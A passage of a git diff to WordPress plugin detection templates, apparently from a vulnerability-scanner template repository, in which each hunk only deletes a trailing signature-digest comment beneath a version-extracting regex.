a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index ae2014096c..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022005fc857171f9e83bead934205ceb194f0346201fb43489450b32196de80902d80221009fa08450aa917b2a5c1c2a1be4749a3bba3a5217ef4f42ede02a3ab6cf01a9b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 4dc7a37288..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202a555eadbdb8d5a25106dc22f90308173ada2ff6eb8d0d0d21f0c2747a5dfaff02207a97c5f74c2851bb9e4a3821782bce01d5bde1cac3dfd2ff415ad53a872bd52d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 5ca8a63844..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100acdfadc2f5f7c97fa024ecff42de444897f2d0487afa82123f3635d393dcda71022100a708d1114100df26cbb8793878b2f6ea3a731855026d867df835fdf2837c7a98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 0aa33d5493..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220086b0e66fc182a06bda67273362670980072addce444e44476be5b039db2cada02206a386a9b33bb5db4427cf2213cff4e80479f97e29c74cb63e9353c01e10362ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index be78beb97a..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e681cf1524b0e794b31235614d9403f3fa4f6c45cc0f04f69b3348ee838794dc022100b73da47a272449a3399f283a062aa9950939279722fdf59d0715d06e19c8f562:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 227e9dc4ff..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d6facfa239f7275df14040cd535d3b65a525d5ec32e67fcbfd27c84a0f863fd8022100fa9d8552f49c41de715152f988cf79437ab9a2934bad7309220d306538e64bac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 118c2a3980..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201b48cda2b471dc7ca1c0cad7faaa778341356043bb23ee1eb9abfa73f0a8677102204c1c15d828ef92db7c640543da97cb952668e2974e3206685d3ecce294419d66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index cb088b34b9..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022062f4a31a34869d15ba99462a93b9ed396e8d910b793cd344d37f53d923673da202207a4a5aa3d6b1816985af74e3b4bb83b34ad0a5adc1de357263177ac85451a3db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 4bbbcc3cc1..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008be7ec1f76ec8b9789b553c8095d969f669fa380fefe00f436109740e7892278022032af71904b947381e5ad50e3b6e2a9a96ec0b22abf4aee5a978299ba6f598a31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 5d78628266..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210080847aadf823df098e23cc9853a34c91a3d1c51963ecb8755be5386ec4803e2402207d29fb536a5ace29764dc6ac1bf4c59a4a7700ebc2f71033f49a97b46e37a814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 0f12f27e58..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e08b129aa58fdecc90ca23da6fd1d3f2e0243dd53ac8633bfd622f29d4c68fe10221009bc5a18f48cc9ffcbf09fbbc94b8132dcddc26ee3b123ca6aa4e0259a97ad893:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 7d50c88bfa..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210085e35ab4c794304a1e507f4829630ad5297f8acc62b9b374272ebbb2c5b1586f022100ae88b108b5bafdd7efcbb701546930418ec3a40a7cd7ceb3c792f156c12441a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 2b5782ef18..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f5a9b667e87a5982da681ef99e11b45027fa6136b778d2f11a79edff7d445856022100d3e6f676060dd1f01caa899145aa91d08988fb282690b3ac9f0055ce8b603d69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 20e35fa5c3..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202539f2289af9fe0a83e3c377e79a908fed78a3bc5362ef01a812e75541deb97d022100bd06b3ead68ea556ad4b3c3e8630c56c055ff2c45cb960d01dfdf57587b14b7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index abd84d2997..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022044fedcf9e079b6c40ce3ef02fec84bea191aee863c0b40e96ae312f8f53d29a502200413e86e46b90add5a5d2b71e5ff2420e781e04622fb734c562abbc8a1af061d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 81b0e46bd6..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e24596f995d1306d64cd499a62bf177d9893c06398108855a91cc3342975e7c6022049b9faf49b898c250b5d70085a4472f672000f404fdff28daecdb326128d2256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 324d2d5ace..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ac84299f69147522c38339820e9e29f60308481580168ddba38078e961f88ebb0221008776197130f6c6e892849503f5451c727835eb2a350e3f3464ac847f1b206e28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 34cbfd4483..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022061a0e33b086ee97fb49c32c4fc5d756f07f933b917f2a3da158904b30a2ff1d7022100ba5a347ab487e136f67b8504558790da6f89d03d2223856264617d428f68c98a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index accfb833a6..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210087e24cbcf18e89b6af720cd3b029309878e790b255ce9e888ae2f0ab07b4d2d30220402bb4058a6d7389fc92c3616e1f446ed44bb47ae9c9cdf6d2286bf4dc68c03b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index efe627f010..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ec0d8c3bbb72f2a6eb6916863bb3e6dd5f3f100dde1e9916c29affd8b93275fb02207bb77aaae343e3f1a5a9ef6d82a6e265cccb980aedc9c8049a89c4a304917af9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 9813e8fc85..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a4591db17c514057b4363d7a49272003b791ab3fe0788bd32b2a31ac7b00e8d90220443e39e7abbca6292d38b1efc5064c83bde4e7d781e82ea8d9300a4f9679e9a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6c1b11362f..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022052585b19c9d0ae752c34a3a45dc626cdb1abced44c07301e2f7c690743dabbff0220311a0dabfcd676b8500795f2a2060befd4e0d64db46479c1ea928f320b46b850:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 4697065c8e..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200c80d7372c8ee6fd4616cacbd82b26f27ec60430540fa126a0e78e6520bfe869022100dc59690343bfee07cfc9970d3fbbd845468d72723fc7db44096219a427a2dfd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 97a6c05da0..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204c5fd859323cde775efba79f1d6b0ebd39db0fd2bd3ccf26efb91a49e3cf4eec0220232243bfb2a8019bb410074972d11b94f52bea8fb442391cb934806b58e1e31a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index df0029c643..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b11201d71adc714b3408c1fcf2393b820890551a3dab02928f2b4a1fd48e1fb702200688a5d234918e88ac35938c17fd1ab346c3346f4ff86e52e7fe397ab1f044b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 2fe6da2460..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220015b9bc1d9aa1f7e6a2c2435fa42ce9ad8c6b0f17db2b4e93c12023cafe49038022100b952999d54750c51053798fb98c94e4b99e91d0b2a44cb28d14f4e9f455f6b45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 926c81f522..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022071f0c94eb3f66e5d459aaf967887969c2e4e9768f1eb4703bc9d502e522c0f560220753af9b673aeab762f844909dd5cfacf038b160a4a0e7ec8eaf522670a78bcbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4e6a953933..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b800b58fba149cc7889140df2dad6a16444e09fdd8f6c90bae5f39f4a1705d1502201e79b5d1564929bd78518d75fd719aed3864b09aa939e5ef90c17b72a8791dde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e3c1312ee0..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c396273006c1727daf6fc25f1e2bb9e356b8327b4bd0f2b76d5c78c1097d3202022100f9cddbc708db9d93a15b2be8b73ee183246e8f43c40e8ee653f72fa2ab2cfbe1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index a019136526..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f704170965f6d0325eb87ed658ebf30de95dd2fcba734dfd3a45192c17cc0dd902203c302113d402051b2a5e552ed70558e06f724a40232cb445519305fb86bec6d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index ac7d085b60..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a5418b4312a0a17ffb4664d0a85f17e50bea694421ce2dddaa075abadf09453d022100e5134610e77f75c55f432baa0ee32d1667c42af02a2c0e0f7f4ebbf340f68790:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 8709e1fa2d..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207a2a5e942a94d3afd7d232aa78f378d50e7d6b28ac83786838df09a753ecfbf5022100f74a2bcf2a62047126cff63faea13b658165b781fec52accef2aebb9e4f0e34a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 94193cdfa2..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205826979e3c2660e146d7da9e4e5a9454112f73761462f34b30361209b79e063d022067c72139fa3e1a306bf7a297c3ac8b757af4368ce42b92dad85daac44674a5ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 9acd0883a7..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204965e163701b859e8fc665538342f20d726096c384185c085fa4bbacd7d742e002203a7816ceee938f6b3ba2c99adcef5a82bb7b4ab362c307cc575e258e1bc55e20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 68e6dae4ba..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201492a1b146d37f2c1997610da5886bf3416d654d7b6435219e2dacc0f139c17a02201911d4819e4d892aae0034b208d366e050b27530324704b116b61b79c8a2b0fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 48acec7113..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bc8252603de333c2a1452933e73f093bbc1120ee4614c6ba1e2b4039bde5a434022042ea990cda51853ebbd8c1bd7e0fb6de2c4160cf2324ea29fa89a18deeec9dad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 298945caff..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009e158ca51fc7207b3297bf512293e74a59da59c3ac005e667d27e231cb99d67b0220505be73cbc6fd49d0e4c29129b9b67f8b3ee8898bd368669581aef857c61d0c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 33fff84212..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206daedd37788fc76eb604e91a9723d3ab37c1ef7d47790e1c0b00e1366dbea5b7022100b40f79e3d1737d21b2b6b5c30c241c251e730d13b1409d40e3675eee159a4b16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 238fceb248..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cc91dcd3a10d2f06fd1677914ce9288c30686fbca9e25ff32f6a6da864f8e40c022100a1dfc7cb2826be0e259925b70e82bfc6cf908c1b6b608dab53843b4470df6ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 7aa5646353..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220772657ef74d41a314b4ae33a117ff5c8e7943915f74755063426edf0aa5a733c02206dfa427babd6df321bbe87f489ba1560942f5a74487503e70f991f1d2340465a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ce6423ff19..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d0351be43b5208974434bf157ce5457246be0a820d39c59d4e431203a492c1f40221009150416600617bef0499b49931188517844a2ebd06b6c074266a6fe34eb170af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 6b35d35c7e..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210089053add319adb71976f8cf106f0999c137d9d64c34f4844b380bef41427b55302210083b0fff3f04d764f0fe8c0c9f06e99d79d02756f6d6f458fe13e9b4d15bdd555:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 200c713615..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220458a24270e4c7930bc7f6a634923d1201263ec4253ed3c79d73d3bfa3fa5268202205a64d410deb259e4a03033890534277b6d83c2f3da3dd0d8646a6548cc76d03c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 2f409c854a..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009977e2d070496bb79ceb714b3a79fc9982a07cde6e4a523bbf14268ce2484796022005d3f2903c92d68934658c6d347057ccb10b01d1db857e4ca26d47c3188fe64e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 8898760b54..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bb764a3ac2acacdbcf9ae34ecd48849df62e40d07dc60aa3cca758ddf3aab8a5022100c1138aa7a8e46131df8a3ae1f41105df1e8d6af93692fca3f4bdfa0060e67352:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 28eb3cb4dc..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210090c90142ceee8dd908da4b217814a8b0888de2a271058b28e107dc71174d10460220610eaa6a183ec74c1fe7ae10b88a246e3489ab6acb404518541d1e465882cf85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index f30a61833d..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ 